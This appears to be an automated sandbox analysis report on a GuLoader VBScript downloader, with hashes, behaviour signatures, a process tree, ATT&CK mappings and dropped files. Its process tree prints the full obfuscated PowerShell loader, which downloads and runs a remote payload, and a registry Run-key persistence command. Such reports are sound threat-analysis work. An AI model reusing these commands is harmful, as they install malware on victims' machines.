Overview

overview

10

Static

static

1

64c701bc7d...cd.vbs

windows7-x64

10

64c701bc7d...cd.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    03-07-2024 01:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    64c701bc7d32900bf11e8f5dd9bed584d350a949c467f5fd6643e8cd7f902fcd.vbs

  • Size

    26KB

  • MD5

    ed86258f8c9db682ae810896c67d498c

  • SHA1

    e182aef5ecacc6bec36e9bc2bb255436b9dae698

  • SHA256

    64c701bc7d32900bf11e8f5dd9bed584d350a949c467f5fd6643e8cd7f902fcd

  • SHA512

    b90e69ed8c473994472b813ef68c45d91e4c46485227f109d400a8b7d4ebfe425abc585387ed61f9e51fd00fd6cdca16f9bf4bf1800082d9cebc8d650429822a

  • SSDEEP

    384:PlzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgwwCjnvhTT1EFw:9zSR022X/523S0e8xPPmVvJr08hpouGs

Score
10/10
guloaderdownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\64c701bc7d32900bf11e8f5dd9bed584d350a949c467f5fd6643e8cd7f902fcd.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1284
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Relinquishments Middelvejen Oksehalens Sekstenaarsfdselsdagens Transceive2 Bewailment Prmielaanets opbyggendes Kulturudbuddets156 helliggjordes disrates Corrosible ladybug Opvikle Udvalgsprocedurens191 Eutaxies Anaphora Radierer Testatorernes Optegnelsesbger Ministrant187 Algums Indberetningspligter Wakerobin Relinquishments Middelvejen Oksehalens Sekstenaarsfdselsdagens Transceive2 Bewailment Prmielaanets opbyggendes Kulturudbuddets156 helliggjordes disrates Corrosible ladybug Opvikle Udvalgsprocedurens191 Eutaxies Anaphora Radierer Testatorernes Optegnelsesbger Ministrant187 Algums Indberetningspligter Wakerobin';If (${host}.CurrentCulture) {$Cuculidae++;}Function Glycosemia205($Drfyldingernes){$Folkloric=$Drfyldingernes.Length-$Cuculidae;$Decalvant='SUBsTRI';$Decalvant+='ng';For( $Fritures=1;$Fritures -lt $Folkloric;$Fritures+=2){$Relinquishments+=$Drfyldingernes.$Decalvant.Invoke( $Fritures, $Cuculidae);}$Relinquishments;}function Eksistensminimas($Rettesnorene){ &($Prosadigtene) ($Rettesnorene);}$signallygtens=Glycosemia205 'AM.o z i l.lRa./ 5U. 0, b( Wsi.nEd o w s, ,NdT. 1C0M. 0U;, SW i n 6 4A;t .x 6 4G; Tr vK: 1 2G1 . 0n). AG,e cOk oS/ 2 0 1 0,0 1A0R1. ,F itrMerfSo,xO/ 1M2 1 .A0F ';$Millihg=Glycosemia205 ' UCs eor - A,gDe.nFt ';$Transceive2=Glycosemia205 'sh,t t pD: /S/N1 0 3 ..1F9E5 .U2 3N7S. 4.3,/ N y.e t .KqOxFdS> h tAt.pSsE:P/,/Tm,i l aDn aRcOe.sA.Cc,o,m / N,y.e t ..qAxEdv ';$Mellemliggende=Glycosemia205 ',>. ';$Prosadigtene=Glycosemia205 'DiAeSx ';$Distendedly='opbyggendes';$Tilbageholdelses = Glycosemia205 'ce.c,hMoU S%,aRp.pKd aRtDaS%s\ s.tBa,l lLm aUnP. FArBoN &C&K IeOcEhco St ';Eksistensminimas (Glycosemia205 'D$ g.lHoEbSaNlP:SP a.rua,l l e lReVd =.( cSmTd ./Uc $GT,i l,b aBg e.h o,lPd.e.l s.eFsS)H ');Eksistensminimas (Glycosemia205 'U$igIlSo bSaAl :USUe.kUsLtMeUnHa,a rBsCf,dSsFeelfs d.aIgZeunMsH=p$,TArUa.nAs,cUePi.v e.2 .Os,p.l,i,tI(H$UM e.lPlDePm.l.iBg.gFeVn d eT)I ');Eksistensminimas (Glycosemia205 ' [ N e.t,.oSAe.r v iRcEe.PDo iUn t MFa,n a,g eIr ]L:K: S e.c uFrfi t y PSrNoStCoScBo,l =s M[ NRe.tU..SSe,c u rTi t y,PSrDo tGoHcPoClrT,yBpAeF] :A:CT.lOs 1D2 ');$Transceive2=$Sekstenaarsfdselsdagens[0];$Lothar= (Glycosemia205 'A$,gfl o b aUl :,D i s eJnLtTe.r =VNNeRw - O.bRj.eBc tC S y,s t e,mI.AN.e tk. WTeIb,CFl.ile,n t');$Lothar+=$Paralleled[1];Eksistensminimas ($Lothar);Eksistensminimas (Glycosemia205 'S$DDRiCsDeTnGt.e rS. HPeRaNd eSrKs [C$,MLi.lAlPiKhGg ]D=P$ s,i g n aPlHl y.g.tte nMsP ');$Emigated=Glycosemia205 ' $ DFi,s,eVnLt eSrS.PDBoUwRnYl ofa,d F.i l e (N$FT,rAaSnTs cKe iNvFe 2S,P$TANl g,u.mAsF) ';$Algums=$Paralleled[0];Eksistensminimas (Glycosemia205 'A$ g l.oFbCa lG: BNuMfHf.ePrSe dG= ( TRe,sSt,- PDa t h R$HA,l g uSmTs,) ');while (!$Buffered) {Eksistensminimas (Glycosemia205 ' $BgClhoObiaCl :SA,n.g eSlMi.cLnAePsRsF= $AtKrSuDe ') ;Eksistensminimas $Emigated;Eksistensminimas (Glycosemia205 'BS tFa rEtO- S lOeAePpL f4P ');Eksistensminimas (Glycosemia205 'P$fg,l o b a lF:SBHuKfSf.eSrfesd,=W(UT eSs.t -CPEa t h $.AAl,gFuBm s )U ') ;Eksistensminimas (Glycosemia205 'S$LgNlAoPbMaSl :VO,k,sBeEh,aKl eRnls,=,$.g,l o b.acl : M iKd dTe lSv e jSeTn.+.+M%C$DSKe kOsSt.e nPaWaSrds fAd sHeUlPs.dHaVgFeFnfs..ncTopuhnNt. ') ;$Transceive2=$Sekstenaarsfdselsdagens[$Oksehalens];}$Sandhedsvidnet=334484;$Phytol=26427;Eksistensminimas (Glycosemia205 ' $ gNl o bNa lI:TK u.lOtDuMrPuNdAbCuMd d e tQs 1U5S6a C=T TGSe t -PC o nPtCeKn tB $.AOlSg,uCmKsC ');Eksistensminimas (Glycosemia205 ' $Ig l o bRa.lK:BsVw a.gT G=, [BSsy s tUeFm .SCbo nLvCe rNt ]D: : FSrAo mtBFa.s.eR6.4fS t rDiDnPg (A$,KRuMl t u r u.d b,u dAdJe t,s,1K5 6V) ');Eksistensminimas (Glycosemia205 ' $ g,l oSb aKl :.CFo rKrMo sSi b,l.e ,=P [ S.yFsBt,eSm..ETSe,xSth.KE n cJoFdji,n g ]H:J:VASS C.I,IS.,G,e tHSGt.r i nGg (b$ sRwPa,g,), ');Eksistensminimas (Glycosemia205 'E$TgUl oEb.aFl.:SEBhbrBlgiMc h,m,a,nS=B$ C oCrrrCoDs iTbDlTe.. sSuRb,s t r,iTnBgp(B$,S a,n.d,h e d.s v iFd.nSeHt ,B$ PSh y tSo,l,)O ');Eksistensminimas $Ehrlichman;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\stallman.Fro && echo t"
        3⤵
          PID:3036
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Relinquishments Middelvejen Oksehalens Sekstenaarsfdselsdagens Transceive2 Bewailment Prmielaanets opbyggendes Kulturudbuddets156 helliggjordes disrates Corrosible ladybug Opvikle Udvalgsprocedurens191 Eutaxies Anaphora Radierer Testatorernes Optegnelsesbger Ministrant187 Algums Indberetningspligter Wakerobin Relinquishments Middelvejen Oksehalens Sekstenaarsfdselsdagens Transceive2 Bewailment Prmielaanets opbyggendes Kulturudbuddets156 helliggjordes disrates Corrosible ladybug Opvikle Udvalgsprocedurens191 Eutaxies Anaphora Radierer Testatorernes Optegnelsesbger Ministrant187 Algums Indberetningspligter Wakerobin';If (${host}.CurrentCulture) {$Cuculidae++;}Function Glycosemia205($Drfyldingernes){$Folkloric=$Drfyldingernes.Length-$Cuculidae;$Decalvant='SUBsTRI';$Decalvant+='ng';For( $Fritures=1;$Fritures -lt $Folkloric;$Fritures+=2){$Relinquishments+=$Drfyldingernes.$Decalvant.Invoke( $Fritures, $Cuculidae);}$Relinquishments;}function Eksistensminimas($Rettesnorene){ &($Prosadigtene) ($Rettesnorene);}$signallygtens=Glycosemia205 'AM.o z i l.lRa./ 5U. 0, b( Wsi.nEd o w s, ,NdT. 1C0M. 0U;, SW i n 6 4A;t .x 6 4G; Tr vK: 1 2G1 . 0n). AG,e cOk oS/ 2 0 1 0,0 1A0R1. ,F itrMerfSo,xO/ 1M2 1 .A0F ';$Millihg=Glycosemia205 ' UCs eor - A,gDe.nFt ';$Transceive2=Glycosemia205 'sh,t t pD: /S/N1 0 3 ..1F9E5 .U2 3N7S. 4.3,/ N y.e t .KqOxFdS> h tAt.pSsE:P/,/Tm,i l aDn aRcOe.sA.Cc,o,m / N,y.e t ..qAxEdv ';$Mellemliggende=Glycosemia205 ',>. ';$Prosadigtene=Glycosemia205 'DiAeSx ';$Distendedly='opbyggendes';$Tilbageholdelses = Glycosemia205 'ce.c,hMoU S%,aRp.pKd aRtDaS%s\ s.tBa,l lLm aUnP. FArBoN &C&K IeOcEhco St ';Eksistensminimas (Glycosemia205 'D$ g.lHoEbSaNlP:SP a.rua,l l e lReVd =.( cSmTd ./Uc $GT,i l,b aBg e.h o,lPd.e.l s.eFsS)H ');Eksistensminimas (Glycosemia205 'U$igIlSo bSaAl :USUe.kUsLtMeUnHa,a rBsCf,dSsFeelfs d.aIgZeunMsH=p$,TArUa.nAs,cUePi.v e.2 .Os,p.l,i,tI(H$UM e.lPlDePm.l.iBg.gFeVn d eT)I ');Eksistensminimas (Glycosemia205 ' [ N e.t,.oSAe.r v iRcEe.PDo iUn t MFa,n a,g eIr ]L:K: S e.c uFrfi t y PSrNoStCoScBo,l =s M[ NRe.tU..SSe,c u rTi t y,PSrDo tGoHcPoClrT,yBpAeF] :A:CT.lOs 1D2 ');$Transceive2=$Sekstenaarsfdselsdagens[0];$Lothar= (Glycosemia205 'A$,gfl o b aUl :,D i s eJnLtTe.r =VNNeRw - O.bRj.eBc tC S y,s t e,mI.AN.e tk. WTeIb,CFl.ile,n t');$Lothar+=$Paralleled[1];Eksistensminimas ($Lothar);Eksistensminimas (Glycosemia205 'S$DDRiCsDeTnGt.e rS. HPeRaNd eSrKs [C$,MLi.lAlPiKhGg ]D=P$ s,i g n aPlHl y.g.tte nMsP ');$Emigated=Glycosemia205 ' $ DFi,s,eVnLt eSrS.PDBoUwRnYl ofa,d F.i l e (N$FT,rAaSnTs cKe iNvFe 2S,P$TANl g,u.mAsF) ';$Algums=$Paralleled[0];Eksistensminimas (Glycosemia205 'A$ g l.oFbCa lG: BNuMfHf.ePrSe dG= ( TRe,sSt,- PDa t h R$HA,l g uSmTs,) ');while (!$Buffered) {Eksistensminimas (Glycosemia205 ' $BgClhoObiaCl :SA,n.g eSlMi.cLnAePsRsF= $AtKrSuDe ') ;Eksistensminimas $Emigated;Eksistensminimas (Glycosemia205 'BS tFa rEtO- S lOeAePpL f4P ');Eksistensminimas (Glycosemia205 'P$fg,l o b a lF:SBHuKfSf.eSrfesd,=W(UT eSs.t -CPEa t h $.AAl,gFuBm s )U ') ;Eksistensminimas (Glycosemia205 'S$LgNlAoPbMaSl :VO,k,sBeEh,aKl eRnls,=,$.g,l o b.acl : M iKd dTe lSv e jSeTn.+.+M%C$DSKe kOsSt.e nPaWaSrds fAd sHeUlPs.dHaVgFeFnfs..ncTopuhnNt. ') ;$Transceive2=$Sekstenaarsfdselsdagens[$Oksehalens];}$Sandhedsvidnet=334484;$Phytol=26427;Eksistensminimas (Glycosemia205 ' $ gNl o bNa lI:TK u.lOtDuMrPuNdAbCuMd d e tQs 1U5S6a C=T TGSe t -PC o nPtCeKn tB $.AOlSg,uCmKsC ');Eksistensminimas (Glycosemia205 ' $Ig l o bRa.lK:BsVw a.gT G=, [BSsy s tUeFm .SCbo nLvCe rNt ]D: : FSrAo mtBFa.s.eR6.4fS t rDiDnPg (A$,KRuMl t u r u.d b,u dAdJe t,s,1K5 6V) ');Eksistensminimas (Glycosemia205 ' $ g,l oSb aKl :.CFo rKrMo sSi b,l.e ,=P [ S.yFsBt,eSm..ETSe,xSth.KE n cJoFdji,n g ]H:J:VASS C.I,IS.,G,e tHSGt.r i nGg (b$ sRwPa,g,), ');Eksistensminimas (Glycosemia205 'E$TgUl oEb.aFl.:SEBhbrBlgiMc h,m,a,nS=B$ C oCrrrCoDs iTbDlTe.. sSuRb,s t r,iTnBgp(B$,S a,n.d,h e d.s v iFd.nSeHt ,B$ PSh y tSo,l,)O ');Eksistensminimas $Ehrlichman;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2584
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\stallman.Fro && echo t"
            4⤵
              PID:2276
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:2844
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chooseable" /t REG_EXPAND_SZ /d "%valleculate% -w 1 $Flkkedes=(Get-ItemProperty -Path 'HKCU:\Optagningsmaskiners\').Kesslerman;%valleculate% ($Flkkedes)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1296
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chooseable" /t REG_EXPAND_SZ /d "%valleculate% -w 1 $Flkkedes=(Get-ItemProperty -Path 'HKCU:\Optagningsmaskiners\').Kesslerman;%valleculate% ($Flkkedes)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:1092

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      2
      T1112

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        9818459ed8d07eb3b0618d08a56c0e64

        SHA1

        51531de552c5d0c837462b0369016466bcf14194

        SHA256

        b57526d9358632ea61e989175f883cee3fe051cf883079246c241a14db6e6dc1

        SHA512

        351bd3a0f86d98813223bb9054e05b6af92c918e269db299d7876d0b374ce3c318dacdd7838bf0f695ff93a952bb1b42ed1cf03c7a29ff8af8e077f2c7f5f321

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\CabBFA7.tmp
        Filesize

        70KB

        MD5

        49aebf8cbd62d92ac215b2923fb1b9f5

        SHA1

        1723be06719828dda65ad804298d0431f6aff976

        SHA256

        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

        SHA512

        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PQNOCWO2Y1R4I1UUE4JP.temp
        Filesize

        7KB

        MD5

        048164925fa17715b2f32582807cc184

        SHA1

        56c6ac3c135c2811e0d084e9799b42722651dcd5

        SHA256

        f56214e5d319290da065226abbc1e9d794de75e32ac9bda0165d8c485ae03edd

        SHA512

        e536cb42a5b85affd4a74f489457ddfe7e8bce5ac9622f24e15f086009802f5e8f95a5220472ac49a3368c42524d48d2c6f97fb7f75b05df6449d365e4d4425a

        Download Submit
      • C:\Users\Admin\AppData\Roaming\stallman.Fro
        Filesize

        469KB

        MD5

        aba02c6ac493c569a13fe65cd959509b

        SHA1

        bad9b1ca9d756e3132c0f6a31d91ff5292261463

        SHA256

        e358c9e0c4fc9d907f60c86fab74df3ebc37ab8e2051d989b76a0ec2cf512461

        SHA512

        a8c55d08fbc07f1a4363b2d546b495ed19520a1069d84c8abf47f296a2e30c2494d477ef9e30248bf70519cf738caf4a6305c027246c683dd38e586786976567

        Download Submit
      • memory/2584-34-0x0000000006730000-0x0000000009077000-memory.dmp
        Filesize

        41.3MB

        Download
      • memory/2612-24-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2612-27-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2612-25-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2612-21-0x000007FEF590E000-0x000007FEF590F000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2612-33-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2612-26-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2612-35-0x000007FEF590E000-0x000007FEF590F000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2612-23-0x0000000001C10000-0x0000000001C18000-memory.dmp
        Filesize

        32KB

        Download
      • memory/2612-22-0x000000001B720000-0x000000001BA02000-memory.dmp
        Filesize

        2.9MB

        Download
      • memory/2612-57-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2844-54-0x0000000001C40000-0x0000000004587000-memory.dmp
        Filesize

        41.3MB

        Download
      • memory/2844-56-0x0000000000BD0000-0x0000000001C32000-memory.dmp
        Filesize

        16.4MB

        Download